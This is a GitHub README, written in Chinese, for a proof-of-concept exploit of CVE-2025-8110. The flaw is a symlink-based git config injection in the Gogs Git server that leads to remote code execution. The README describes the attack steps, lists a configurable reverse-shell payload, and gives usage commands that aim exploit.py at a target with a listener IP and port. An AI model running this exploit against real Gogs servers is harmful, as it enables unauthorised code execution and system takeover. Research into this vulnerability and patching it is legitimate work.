NetsecBandit/CVE-2025-8110-Exploit
GitHub: NetsecBandit/CVE-2025-8110-Exploit
针对 Gogs 符号链接导致的 Git 配置注入 RCVE 的概念验证利用程序。
Stars: 0 | Forks: 0
# CVE-2025-8110 - Gogs 符号链接 Git 配置注入 RCE
[](https://www.python.org/downloads/)
[](LICENSE)
[](https://gogs.io/)
CVE-2025-8110 的概念验证利用程序,这是一种 Gogs 自托管 Git 服务中的关键远程代码执行 (RCE) 漏洞,允许攻击者通过符号链接操纵和 Git 配置注入执行任意命令。
## 🚨 漏洞概述
**CVE-2025-8110** 影响 Gogs 的 [受影响版本] 之前的版本。该漏洞允许经过身份验证的用户:
1. 创建一个包含指向 `.git/config` 的符号链接的存储库
2. 通过 API 覆盖存储库的 `.git/config`(通过符号链接)
3. 注入恶意的 `sshCommand` 指令,在克隆或拉取存储库时执行
这将导致以 Gogs 服务器进程权限运行的远程代码执行。
## 🎯 功能
- **自动化利用**:端到端的利用自动化
- **多格式认证**:支持密码和 API 令牌认证
- **反向 Shell**:可配置的反向 Shell 有效载荷
- **错误处理**:健壮的错误恢复和替代方法
- **调试输出**:详细的日志记录用于故障排除
## 📋 先决条件
- Python 3.8 或更高版本
- 已安装并可在 PATH 中访问 Git
- `requests` Python 包
- 目标 Gogs 实例上的有效凭据或 API 令牌
## 🔧 安装
```
# 克隆仓库
git clone https://github.com/NetsecBandit/CVE-2025-8110-exploit.git
cd CVE-2025-8110-exploit
# 安装依赖
pip install requests
# 使脚本可执行
chmod +x exploit.py
## 用法
python3 exploit.py \
-u http://target-gogs.com \
-lh Your_IP \
-lp 9001 \
--token
```
标签:API令牌, CVE, Git, Git配置篡改, Gogs, Python, RCE, SSH命令注入, T1055, T1059, T1078, Tactics, 供应链攻击, 反向Shell, 开源安全工具, 数字取证, 数字签名, 无后门, 权限绕过, 符号链接, 编程工具, 网络安全, 网络安全研究, 自动化脚本, 认证绕过, 远程代码执行, 逆向工具, 逆向工程平台, 配置注入, 隐私保护